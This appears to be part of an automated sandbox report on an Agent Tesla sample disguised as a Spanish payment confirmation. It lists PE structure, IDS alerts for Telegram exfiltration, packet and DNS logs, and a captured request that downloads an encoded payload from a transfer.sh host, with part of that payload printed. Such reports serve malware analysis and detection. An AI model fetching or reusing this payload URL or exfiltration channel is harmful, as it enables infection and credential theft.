                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x123b00x4b.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x8408.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x123600x1c.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x104040x106004044837c7c3d7dddda7029a942cfb4a3False0.5387494036259542data6.016905640132613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .sdata0x140000x1e80x2009d89f11f2f7efe85ec6025eaf9079f32False0.861328125data6.600064443351503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x160000x84080x8600ac53e23b087661ff82fb9228561598c5False0.28404850746268656data5.191248821715595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x200000xc0x200da2b73780e6bc1e8ac38140886608cbcFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x161c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5487588652482269
                                              RT_ICON0x166280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.37922138836772984
                                              RT_ICON0x176d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.28060165975103735
                                              RT_ICON0x19c780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.25614076523382145
                                              RT_GROUP_ICON0x1dea00x3edata0.7903225806451613
                                              RT_VERSION0x1dee00x33cdata0.4251207729468599
                                              RT_MANIFEST0x1e21c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-25T18:51:27.695363+02002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.849705149.154.167.220443TCP
                                              2024-09-25T18:51:27.695363+02002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.849705149.154.167.220443TCP
                                              2024-09-25T18:51:27.696072+02002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.849705TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2024 18:51:22.987673998 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:22.987716913 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:22.987884045 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:22.998611927 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:22.998631954 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.656989098 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.657078028 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.664200068 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.664217949 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.664556026 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.715066910 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.775324106 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.815407991 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.889084101 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.889163017 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.889306068 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.889321089 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.889478922 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.889516115 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.889525890 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.889595032 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.889595032 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.907906055 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.908082008 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.908236980 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.908257961 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.949454069 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.979186058 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.979358912 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.979448080 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.979551077 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.979593992 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.979593992 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.979602098 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.979667902 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.980428934 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.980562925 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.980972052 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.981070995 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.997874022 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.997991085 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.998035908 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.998048067 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.998060942 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.999010086 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:23.999088049 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:23.999095917 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.043268919 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.066113949 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.066241026 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.066329956 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.066365004 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.066365004 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.066380978 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.066421986 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.066421986 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.067106962 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.067514896 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.067948103 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.068124056 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.068751097 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.068886995 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.068955898 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.068955898 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.068967104 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.069777012 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.069891930 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.069899082 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.069926023 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.069986105 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.069991112 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.070040941 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.070615053 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.070697069 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.070739985 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.070799112 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.084872007 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.084904909 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.084939003 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.084947109 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.085014105 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.085027933 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.085108042 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.085524082 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.085671902 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.154567003 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.154818058 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.154889107 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.154895067 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.154895067 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.154917955 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.155065060 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.155320883 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.155412912 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.155457973 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159040928 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159245014 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159317017 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.159317017 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.159348011 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159406900 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.159413099 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159454107 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159545898 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.159550905 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159727097 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159801960 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.159832001 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159861088 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159914017 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.159919024 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.159934998 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.160007000 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.160060883 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.160075903 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.160075903 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.160080910 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.160103083 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.173372030 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.173527002 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.173536062 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.173796892 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.173835993 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.173855066 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.173867941 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.173885107 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.174010992 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.174041033 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.174067974 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.174086094 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.174101114 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.174413919 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.174472094 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.174494028 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.174500942 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.174690008 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.174792051 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.174870968 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.174876928 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.174930096 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.242969990 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243027925 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243057013 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243130922 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.243154049 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243223906 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.243223906 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.243539095 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243604898 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243648052 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.243648052 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.243663073 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243707895 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243774891 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243807077 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.243814945 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.243834019 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.244065046 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.244136095 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.244164944 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.244174004 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.244190931 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.244463921 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.244550943 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.244556904 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.244568110 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.244636059 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.244637966 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.244688988 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.244695902 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245039940 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245091915 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.245098114 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245217085 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245287895 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.245301962 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245363951 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245450020 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.245455980 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245508909 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.245515108 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245686054 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.247817039 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.247878075 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.247910976 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.247920036 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.247946024 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.247993946 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.247993946 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.248002052 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.248047113 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.248076916 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.248111010 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.248148918 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.248156071 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.248164892 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.262011051 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.262146950 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.262300968 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.262300968 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.262321949 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.262517929 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.262617111 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.283703089 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:26.012808084 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.012862921 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.013207912 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.016957998 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.016973972 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.636127949 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.636344910 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.641592979 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.641607046 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.641875982 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.683952093 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.688114882 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.731446028 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.949842930 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.950191975 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.950232029 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:27.695590973 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:27.695806980 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:27.695883989 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:27.717973948 CEST49705443192.168.2.8149.154.167.220

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2024 18:51:22.810648918 CEST6048053192.168.2.81.1.1.1
                                              Sep 25, 2024 18:51:22.977866888 CEST53604801.1.1.1192.168.2.8
                                              Sep 25, 2024 18:51:26.000494003 CEST5884853192.168.2.81.1.1.1
                                              Sep 25, 2024 18:51:26.007617950 CEST53588481.1.1.1192.168.2.8

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 25, 2024 18:51:22.810648918 CEST192.168.2.81.1.1.10x48c4Standard query (0)transfer.adttemp.com.brA (IP address)IN (0x0001)false
                                              Sep 25, 2024 18:51:26.000494003 CEST192.168.2.81.1.1.10xb0cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 25, 2024 18:51:22.977866888 CEST1.1.1.1192.168.2.80x48c4No error (0)transfer.adttemp.com.br104.196.109.209A (IP address)IN (0x0001)false
                                              Sep 25, 2024 18:51:26.007617950 CEST1.1.1.1192.168.2.80xb0cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • transfer.adttemp.com.br
                                              • api.telegram.org

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.849704104.196.109.2094433020C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 16:51:23 UTC92OUTGET /cCoB5/anonymous.txt HTTP/1.1
                                              Host: transfer.adttemp.com.br
                                              Connection: Keep-Alive
                                              2024-09-25 16:51:23 UTC312INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 16:51:23 GMT
                                              Server: Transfer.sh HTTP Server 1.0
                                              Content-Disposition: attachment; filename="anonymous.txt"
                                              Content-Length: 320184
                                              Content-Type: text/plain; charset=utf-8
                                              X-Made-With: <3 by DutchCoders
                                              X-Served-By: Proudly served by DutchCoders
                                              Connection: close
                                              2024-09-25 16:51:23 UTC3784INData Raw: 66 4b 32 4e 61 51 78 48 56 59 5a 56 54 41 6f 2b 4e 65 4c 79 57 4e 6b 4c 67 47 45 66 74 62 47 65 73 48 52 63 61 77 39 41 46 64 57 72 67 35 48 6f 65 42 48 4b 79 4f 42 62 63 55 54 2b 65 71 7a 64 38 6e 76 6a 31 56 58 54 6b 33 6c 74 39 50 41 51 5a 44 7a 4d 73 65 52 31 44 69 44 65 75 43 47 77 69 69 57 57 53 50 48 41 73 55 54 32 50 79 79 35 77 7a 72 5a 36 46 5a 76 4f 59 6a 67 54 7a 53 30 4b 34 74 32 33 55 67 64 49 62 6e 50 38 6a 73 50 48 49 6c 6a 6c 6b 74 45 72 4e 5a 72 65 79 7a 5a 53 57 74 2f 2b 30 37 31 54 58 58 6f 6a 35 38 43 75 62 32 69 32 37 41 30 43 2f 51 30 35 30 52 71 41 2f 6c 51 33 4b 4e 75 34 6c 76 6a 69 67 71 38 34 6c 30 69 75 35 34 6b 4c 55 65 64 42 4b 4e 47 58 44 6f 7a 74 32 35 44 48 38 6e 31 48 43 63 47 57 6b 48 2f 2f 52 37 58 54 43 6c 7a 55 53 67
                                              Data Ascii: fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6FZvOYjgTzS0K4t23UgdIbnP8jsPHIljlktErNZreyzZSWt/+071TXXoj58Cub2i27A0C/Q050RqA/lQ3KNu4lvjigq84l0iu54kLUedBKNGXDozt25DH8n1HCcGWkH//R7XTClzUSg
